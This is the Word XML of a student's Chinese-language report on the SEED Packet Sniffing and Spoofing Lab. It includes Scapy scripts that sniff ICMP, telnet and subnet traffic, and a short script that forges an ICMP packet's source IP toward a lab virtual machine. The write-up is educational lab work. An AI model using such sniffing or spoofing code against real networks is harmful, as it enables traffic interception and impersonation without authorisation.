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0FF26F" w14:textId="54871C2F" w:rsidR="0032339C" w:rsidRDefault="003E2B80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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>．</w:t>
      </w:r>
      <w:r w:rsidR="0032339C" w:rsidRPr="0032339C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Packet Sniffing and Spoofing Lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F27695" w14:textId="51DD3E6E" w:rsidR="00C0589D" w:rsidRDefault="0072386A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Pr="000B534D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00816CBB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>.1</w:t>
      </w:r>
      <w:r w:rsidR="00C37630">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>A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2CA071A" w14:textId="4BB7E315" w:rsidR="0032339C" w:rsidRPr="0032339C" w:rsidRDefault="0032339C" w:rsidP="00F34B64">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0032339C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用root权限运行test</w:t>
      </w:r>
      <w:r w:rsidRPr="0032339C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidRPr="0032339C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>py，开始捕捉报文，打开另一个终端对</w:t>
      </w:r>
      <w:r w:rsidR="00566C3E">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00566C3E">
        <w:instrText xml:space="preserve"> HYPERLINK "http://www.baidu.com" </w:instrText>
      </w:r>
      <w:r w:rsidR="00566C3E">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="0032339C">
        <w:rPr>
          <w:rStyle w:val="a4"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>www.baidu.com</w:t>
      </w:r>
      <w:r w:rsidR="00566C3E">
        <w:rPr>
          <w:rStyle w:val="a4"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="0032339C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行ping操作，获得报文内容如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04939526" w14:textId="67063FDA" w:rsidR="00EE1E70" w:rsidRDefault="00816CBB" w:rsidP="00F34B64">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B5B38DD" wp14:editId="584A12B2">
            <wp:extent cx="5274310" cy="802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8015" w14:textId="52808AAD" w:rsidR="0032339C" w:rsidRDefault="0032339C" w:rsidP="00F34B64">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2854E22B" wp14:editId="649BE548">
            <wp:extent cx="5274310" cy="32734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EF9" w14:textId="2F7ACC24" w:rsidR="0032339C" w:rsidRDefault="0032339C" w:rsidP="00F34B64">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不使用root运行test</w:t>
      </w:r>
      <w:r>
        <w:t>1.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，直接出现权限不够的报错，说明</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>scapy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>正常运行需要root权限：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A5D5DF" w14:textId="6E4793F8" w:rsidR="0032339C" w:rsidRDefault="0032339C" w:rsidP="00F34B64">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1EDF5834" wp14:editId="2E8CE55B">
            <wp:extent cx="5274310" cy="1875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72CE" w14:textId="51999E44" w:rsidR="00C37630" w:rsidRDefault="00C37630" w:rsidP="00C37630">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B534D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="000B534D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>ask</w:t>
      </w:r>
      <w:r w:rsidRPr="000B534D"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.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>B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6261CF88" w14:textId="43FB18F0" w:rsidR="0032339C" w:rsidRDefault="00C37630" w:rsidP="00C37630">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（1）只抓取I</w:t>
      </w:r>
      <w:r>
        <w:t>CMP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>报文：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A27459" w14:textId="219C9571" w:rsidR="00C37630" w:rsidRDefault="00C37630" w:rsidP="007119B4">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ask</w:t>
      </w:r>
      <w:r>
        <w:t>1.1A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的代码即为只抓取I</w:t>
      </w:r>
      <w:r>
        <w:t>CMP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>报文的代码，其中：</w:t>
      </w:r>
      <w:r>
        <w:t>fi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lter</w:t>
      </w:r>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>‘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’即为过滤规则。</w:t>
      </w:r>
      <w:r w:rsidR="007119B4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>root运行test</w:t>
      </w:r>
      <w:r w:rsidR="007119B4">
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidR="007119B4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>py，并尝试访问</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="OLE_LINK1"/>
      <w:bookmarkStart w:id="1" w:name="OLE_LINK2"/>
      <w:r w:rsidR="007119B4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="007119B4">
        <w:t>eedsecuritylabs.org</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidR="007119B4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CE0C3B" w14:textId="67AA22D2" w:rsidR="007119B4" w:rsidRDefault="007119B4" w:rsidP="007119B4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4AB1B74C" wp14:editId="2D050CB0">
            <wp:extent cx="5274310" cy="2084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BF8A" w14:textId="24C0A5A2" w:rsidR="007119B4" w:rsidRDefault="007119B4" w:rsidP="007119B4">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>观察到抓取的报文如下，依然全部为I</w:t>
      </w:r>
      <w:r>
        <w:t>CMP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>报文，得证。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9F07F4" w14:textId="67A14E43" w:rsidR="007119B4" w:rsidRDefault="007119B4" w:rsidP="00C37630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4416E2" wp14:editId="1AFBD6F8">
            <wp:simplePos x="1409700" y="3511550"/>
            <wp:positionH relativeFrom="column">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4049184" cy="4512310"/>
            <wp:effectExtent l="0" t="0" r="889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84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rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（2）T</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">CP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>特定</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 23</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751BA529" w14:textId="3765C780" w:rsidR="007119B4" w:rsidRDefault="007119B4" w:rsidP="007119B4">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码如下，对filter参数进行修改：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD78C52" w14:textId="6DEE96CA" w:rsidR="007119B4" w:rsidRDefault="007119B4" w:rsidP="007119B4">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">#!/usr/bin/python3 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042EF465" w14:textId="77777777" w:rsidR="007119B4" w:rsidRDefault="007119B4" w:rsidP="007119B4">
      <w:pPr>
        <w:ind w:firstLine="420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18626890" w14:textId="77777777" w:rsidR="007119B4" w:rsidRDefault="007119B4" w:rsidP="007119B4">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>print_pkt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">(pkt): </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125213B0" w14:textId="77777777" w:rsidR="007119B4" w:rsidRDefault="007119B4" w:rsidP="007119B4">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pkt.show</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324461BE" w14:textId="71D7E36D" w:rsidR="007119B4" w:rsidRDefault="007119B4" w:rsidP="007119B4">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">pkt=sniff(filter = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip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192.168.19.2 and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> port 23,prn=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>print_pkt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="28A843D1" w14:textId="627975F5" w:rsidR="007119B4" w:rsidRDefault="005B1B3F" w:rsidP="007119B4">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因为端口要求为2</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，所以尝试对任意主机进行telnet，这里对host进行尝试连接，从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中可以看出存在符合要求的报文：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1193222C" w14:textId="1A9E94A2" w:rsidR="005B1B3F" w:rsidRDefault="005B1B3F" w:rsidP="007119B4"/>
    <w:p w14:paraId="5000C1F6" w14:textId="5DC2B8FC" w:rsidR="007119B4" w:rsidRDefault="007119B4" w:rsidP="007119B4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A88EB77" wp14:editId="7AD8FFBD">
            <wp:extent cx="5274310" cy="12515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B3F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1DAB5960" wp14:editId="3012D6AF">
            <wp:extent cx="5274310" cy="1085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8B58" w14:textId="2D5D5C24" w:rsidR="005B1B3F" w:rsidRDefault="005B1B3F" w:rsidP="007119B4">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>root运行t</w:t>
      </w:r>
      <w:r>
        <w:t>est2.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，成功抓取到报文，其他情况下均没有报文内容显示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C671F2B" w14:textId="4ED11625" w:rsidR="005B1B3F" w:rsidRDefault="005B1B3F" w:rsidP="007119B4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E403193" wp14:editId="52638423">
            <wp:extent cx="5274310" cy="4231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64B4" w14:textId="76F93EDA" w:rsidR="005B1B3F" w:rsidRDefault="005B1B3F" w:rsidP="007119B4">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（3）捕获去往或来自某一子网的报文，非本子网：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447EC000" w14:textId="77777777" w:rsidR="005B1B3F" w:rsidRDefault="005B1B3F" w:rsidP="005B1B3F">
      <w:r>
        <w:t xml:space="preserve">#!/usr/bin/python3 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D98A66D" w14:textId="77777777" w:rsidR="005B1B3F" w:rsidRDefault="005B1B3F" w:rsidP="005B1B3F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7435890C" w14:textId="77777777" w:rsidR="005B1B3F" w:rsidRDefault="005B1B3F" w:rsidP="005B1B3F">
      <w:r>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>print_pkt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">(pkt): </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D78F50" w14:textId="77777777" w:rsidR="005B1B3F" w:rsidRDefault="005B1B3F" w:rsidP="005B1B3F">
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pkt.show</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52ED288E" w14:textId="11F323EA" w:rsidR="005B1B3F" w:rsidRDefault="005B1B3F" w:rsidP="005B1B3F">
      <w:r>
        <w:t>pkt=sniff(filter='net 128.230',prn=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>print_pkt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B58FDD" w14:textId="60A9E9BB" w:rsidR="00EC0CC8" w:rsidRDefault="00EC0CC8" w:rsidP="005B1B3F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>尝试访问s</w:t>
      </w:r>
      <w:r>
        <w:t>eedsecuritylabs.org</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，成功捕获到去往1</w:t>
      </w:r>
      <w:r>
        <w:t>28.230.0.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>子网的报文：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D209738" w14:textId="1AE2AE6B" w:rsidR="005B1B3F" w:rsidRDefault="00EC0CC8" w:rsidP="005B1B3F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="054A0D8D" wp14:editId="67E65B4D">
            <wp:extent cx="5274310" cy="38798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2D6C" w14:textId="5D9400E4" w:rsidR="00EC0CC8" w:rsidRDefault="00EC0CC8" w:rsidP="005B1B3F"/>
    <w:p w14:paraId="444108E5" w14:textId="77777777" w:rsidR="005B1B3F" w:rsidRPr="007119B4" w:rsidRDefault="005B1B3F" w:rsidP="007119B4"/>
    <w:p w14:paraId="7922BF97" w14:textId="3BE5BF6C" w:rsidR="000B534D" w:rsidRPr="000B534D" w:rsidRDefault="000B534D" w:rsidP="00F34B64">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B534D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Task</w:t>
      </w:r>
      <w:r w:rsidR="00EC0CC8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidRPr="000B534D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="000B534D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FA08AF" w14:textId="6E04F5A2" w:rsidR="003E2B80" w:rsidRDefault="003E2B80" w:rsidP="003E2B80">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改后</w:t>
      </w:r>
      <w:r w:rsidRPr="003E2B80">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码如下，加粗部分</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r w:rsidRPr="003E2B80">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>替换源</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003E2B80">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003E2B80">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址为1</w:t>
      </w:r>
      <w:r w:rsidRPr="003E2B80">
        <w:t>92.168.19.111</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（虚构的地址），以欺骗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为1</w:t>
      </w:r>
      <w:r>
        <w:t>92.168.19.142</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的ubuntu虚拟机</w:t>
      </w:r>
      <w:r w:rsidRPr="003E2B80">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5049A0" w14:textId="77777777" w:rsidR="003E2B80" w:rsidRPr="003E2B80" w:rsidRDefault="003E2B80" w:rsidP="003E2B80"/>
    <w:p w14:paraId="7852C02F" w14:textId="22FB1FA7" w:rsidR="003E2B80" w:rsidRPr="003E2B80" w:rsidRDefault="003E2B80" w:rsidP="003E2B80">
      <w:r w:rsidRPr="003E2B80">
        <w:t xml:space="preserve">#!/usr/bin/python3 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A3C4D6" w14:textId="77777777" w:rsidR="003E2B80" w:rsidRPr="003E2B80" w:rsidRDefault="003E2B80" w:rsidP="003E2B80">
      <w:r w:rsidRPr="003E2B80">
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003E2B80">
        <w:t>scapy.all</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003E2B80">
        <w:t xml:space="preserve"> import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC2FFAA" w14:textId="77777777" w:rsidR="003E2B80" w:rsidRPr="003E2B80" w:rsidRDefault="003E2B80" w:rsidP="003E2B80">
      <w:r w:rsidRPr="003E2B80">
        <w:t>a = IP()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D6DFE4" w14:textId="77777777" w:rsidR="003E2B80" w:rsidRPr="003E2B80" w:rsidRDefault="003E2B80" w:rsidP="003E2B80">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003E2B80">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>a.src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003E2B80">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>='192.168.19.111'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F582470" w14:textId="77777777" w:rsidR="003E2B80" w:rsidRPr="003E2B80" w:rsidRDefault="003E2B80" w:rsidP="003E2B80">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003E2B80">
        <w:t>a.dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003E2B80">
        <w:t xml:space="preserve"> ='192.168.19.142'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737ACB21" w14:textId="77777777" w:rsidR="003E2B80" w:rsidRPr="003E2B80" w:rsidRDefault="003E2B80" w:rsidP="003E2B80">
      <w:r w:rsidRPr="003E2B80">
        <w:t>b = ICMP()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CFA74D" w14:textId="77777777" w:rsidR="003E2B80" w:rsidRPr="003E2B80" w:rsidRDefault="003E2B80" w:rsidP="003E2B80">
      <w:r w:rsidRPr="003E2B80">
        <w:t>p = a/b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACE4EBB" w14:textId="1ED98EE5" w:rsidR="003E2B80" w:rsidRDefault="003E2B80" w:rsidP="003E2B80">
      <w:r w:rsidRPr="003E2B80">
        <w:t>send(p)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4B9905" w14:textId="77777777" w:rsidR="003E2B80" w:rsidRDefault="003E2B80" w:rsidP="003E2B80"/>
    <w:p w14:paraId="3A2BCC72" w14:textId="14090925" w:rsidR="003E2B80" w:rsidRPr="003E2B80" w:rsidRDefault="003E2B80" w:rsidP="003E2B80">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在seed虚拟机中转可见该报文成功发出：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C23D1E1" w14:textId="39B08B69" w:rsidR="00EC0CC8" w:rsidRDefault="003E2B80" w:rsidP="000B534D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51B90276" wp14:editId="0AF0FD49">
            <wp:extent cx="5274310" cy="7327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131C" w14:textId="3E3A26A3" w:rsidR="003E2B80" w:rsidRDefault="003E2B80" w:rsidP="000B534D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E2B80">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003E2B80">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003E2B80">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>92.168.19.142</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的ubuntu虚拟机中抓包，可见它能够收到seed传来的报文并且通过</w:t>
      </w:r>
      <w:r>
        <w:t>ARP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>询问谁是1</w:t>
      </w:r>
      <w:r>
        <w:t>92.168.19.111</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C25AB59" w14:textId="5625700A" w:rsidR="003E2B80" w:rsidRDefault="003E2B80" w:rsidP="000B534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367989" wp14:editId="7E0372A2">
